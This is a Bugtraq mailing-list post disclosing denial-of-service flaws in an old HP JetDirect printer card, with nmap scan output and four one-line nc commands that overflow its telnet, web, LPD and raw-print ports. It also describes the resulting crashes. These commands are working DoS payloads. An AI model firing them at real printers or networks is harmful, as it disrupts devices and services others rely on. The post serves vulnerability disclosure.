<<< Date Index >>>     <<< Thread Index >>>

Re: Promiscuous email printing in Canon imageRunner



> Try scanning the Ip address with nmap -A 10.0.0.1

Hello Bugtraq,

While we're talking about printers, some time ago i discovered by accident 
some lame Denial of Service vulnerabilities in my HP JetDirect printer 
(tested on J3111A, firmware version G.05.35 -- pretty old). Not sure if 
they can be reproduced on newer models/firmwares.

Here we go:

root@charon:~# nmap -A x.x.x.x
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     HP JetDirect printer telnetd
80/tcp   open  http?
515/tcp  open  printer?   
9100/tcp open  jetdirect? 
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card

# telnet -> crash of all network services
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23

# http -> crash of all network services with funny stack dump on paper! ;)
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80

# printer -> the printer switches indefinitely between data recv and ready
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515

# jetdirect -> prints ABCD... and leaves the printer in "unstable" status
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100

I've scanned the funny stack dump printed on paper and put it on-line at:

http://www.0xdeadbeef.info/stuff/hp-crash.jpg

You should also take a look to Paul Szabo's excellent web resources on 
PostScript, PJL/PCL, and secure HP printers configuration:

http://www.maths.usyd.edu.au:8000/u/psz/ps.html

Cheers,

-- 
Marco Ivaldi
Antifork Research, Inc.   http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233  0394 EF85 2008 DBFD B707